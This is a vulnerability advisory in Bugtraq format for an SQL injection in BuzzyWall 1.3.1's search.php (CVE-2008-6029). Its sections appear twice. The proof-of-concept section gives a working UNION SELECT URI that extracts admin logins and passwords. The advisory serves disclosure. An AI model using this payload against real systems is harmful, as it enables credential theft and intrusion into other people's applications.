BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
BID:31308
Info
BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
| Bugtraq ID: | 31308 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6029 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 22 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | ~!Dok_tOR!~ |
| Vulnerable: |
BuzzScripts BuzzyWall 1.3.1 |
| Not Vulnerable: | |
Discussion
BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
BuzzyWall is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
BuzzyWall 1.3.1 is vulnerable; other versions may also be affected.
BuzzyWall is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
BuzzyWall 1.3.1 is vulnerable; other versions may also be affected.
Exploit / POC
BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
Solution / Fix
BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
BuzzScripts BuzzyWall 'search.php' SQL Injection Vulnerability
References:
References:
- BuzzyWall Homepage (BuzzScripts)